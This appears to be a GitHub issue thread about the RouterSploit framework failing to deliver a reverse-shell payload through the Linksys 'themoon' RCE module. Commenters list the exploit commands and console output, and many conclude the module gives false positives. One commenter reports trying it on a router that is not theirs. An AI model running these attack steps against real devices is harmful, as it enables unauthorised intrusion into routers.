routersploit Could not set up HTTP server on lhost / can't transfer payload

Current Behavior

Crashes when attempting to transfer payload/setting HTTP server (should be vulnerable)
Same behaviour on Mac OS & Kali Linux

cmd (MIPSLE Reverse TCP) > run [*] Using wget method [-] Could not set up HTTP Server on 192.168.0.102:5555 [-] Exploit failed to transfer payload

Expected Behavior

Should open reverse shell

Steps to Reproduce (for bugs)

use exploits/routers/linksys/eseries_themoon_rce
set target 192.168.0.1
run
set payload reverse_tcp
set lhost 192.168.0.102
run

Environment

RouterSploit Version used: 3.4.0 (on both OS)
Operating System and version: Mac OS 10.14.1 | Kali Linux 2018.1
Python Version: 3.7.1 | 3.6.7
Python Environment: asn1crypto==0.24.0 bcrypt==3.1.4 certifi==2018.10.15 cffi==1.11.5 chardet==3.0.4 cryptography==2.3.1 future==0.16.0 idna==2.7 paramiko==2.4.2 ply==3.11 pyasn1==0.4.4 pycparser==2.19 pycryptodome==3.6.6 pycryptodomex==3.6.6 PyNaCl==1.3.0 pysmi==0.3.1 pysnmp==4.4.6 requests==2.20.0 six==1.11.0 urllib3==1.24

Nov 18 '18 17:11 jansramek

have the exact same problem! Please notify me if you find something that helps you.

Nov 18 '18 22:11 stefan9999991

Got the same problem, please notify me tooo (:

Nov 21 '18 19:11 hackmybeer

Any solutions yet?

Nov 28 '18 22:11 stefan9999991

Also having it :( notif me when you find a solution

Dec 22 '18 20:12 GianisTsol

Same here.

Dec 24 '18 22:12 Keskebeu

same lol.

Dec 26 '18 16:12 Bbcomb

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Dec 26 '18 16:12 Keskebeu

Exact same here. However I can verify the router I'm scanning is NOT a Linksys router.

Jan 13 '19 20:01 KentuckyJohnOliver

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Same on non Linksys router. It is probably false positive.

Jan 15 '19 11:01 jansramek

Could be the case. The router I tried it on was a linksys router. When I used it in a Motorola router nothing came up. I also read somewhere else that it had to with that and we are expected to change the code based on the linksys router.

It could be a router which is made by Linksys or uses Linksys components and or software, just different name.

On Tue, Jan 15, 2019, 6:21 AM jansramek <[email protected] wrote:

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Same on non Linksys router. It is probably false positives.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/threat9/routersploit/issues/550#issuecomment-454358347, or mute the thread https://github.com/notifications/unsubscribe-auth/AYP2GFMPl0LYgprtjFH9yMnhWzCjfGi9ks5vDbmbgaJpZM4YoDFv .

Jan 15 '19 16:01 Keskebeu

same here

Feb 21 '19 02:02 ghost

I'm also having that issue but I think I might have found a fix keyword "might" make sure apache is started by typing "sudo service apache2 start"

Feb 22 '19 04:02 sudo-jake

Looks like a false positive. If you go through the logs it uses an HTTP GET for the tmUnblock.cgi file. It marks a successful GET as Vulnerable.

You can wget the file yourself: wget <router IP>/tmUnblock.cgi Compare it to the source code for the login screen. In my case, they're the same.

Mar 14 '19 22:03 Hayzr

same here. i got this problem, how to solve ?

Apr 02 '20 10:04 HarizDharma

I also have the same problem. Although it marks the router as vulnerable, I can confirm that the router is not Linksys, so it might me a false positive but I wonder why the HTTP server error occurs. Setting up the server on lhost shouldnt be related to the payload working or not against the router. Any thoughts on this?

The fact of this issue being open since 2018 is not a good sign. Captura de pantalla de 2020-04-16 15-44-01

Apr 16 '20 13:04 evoke0

i get this too

May 21 '20 14:05 ghost

Anybody here found the solution ?

Sep 19 '20 12:09 sealoomaan

Same error, but if I set a port that the router is using for other tcp/udp connections the payload is being handled somehow, i think anyway,

mipsle

The router is a Huawei DG8245W2-10, not mine so I don't know fw v, the owner have forgotten the admin passw.

Here is the handshake - payload scr->wireshark

At first glance the response looked like a normal POST to /tmUnblock.cgi
....but there is something mpr

payload

mp2

Nov 26 '20 18:11 l014

heeeeeeeelp!!

Nov 27 '20 21:11 gabriel2018-27

any solution?

Nov 29 '20 01:11 blackerr

2021 still doesnt work. Probably as the guy send above its a "False Positive"

Feb 15 '21 08:02 OmiceyO

any solution?

I have same problem

Apr 27 '21 15:04 cm038

Nobody ?

Apr 27 '21 15:04 cm038

Hey... When i chance the lport it comes step closer

cmd (MIPSLE Bind TCP) > set lport 8080
lport => 8080
cmd (MIPSLE Bind TCP) > run

[] Using wget method
[] Using wget to download binary
[-] Exploit failed to transfer payload

Apr 27 '21 15:04 cm038

yeah still getting this, no idea whats going on, false-positive seems the most likely

May 15 '21 10:05 overtimepog

getting this too

Jun 22 '21 01:06 imansour12

Screenshot_462

I have same problem

Sep 05 '21 15:09 andvargrad

I think the "Could not set up HTTP server on lhost" message is displayed because it attempts at opening a new connection on the specified port without killing the first one, or something like this.

Oct 29 '21 15:10 mariosacaj

I tried the checker for this exploitation module on a non-link sys router, and it showed up as vulnerable, but had the same issue. I think we can confirm this is a false positive now.

May 11 '23 03:05 Codeiology

Screenshot_2023-09-10-11-51-04-304_com.termux.jpg

I have the same problem(

Sep 10 '23 08:09 Dlazder

routersploit routersploit copied to clipboard

Could not set up HTTP server on lhost / can't transfer payload

Current Behavior

Expected Behavior

Steps to Reproduce (for bugs)

Environment

routersploit
routersploit copied to clipboard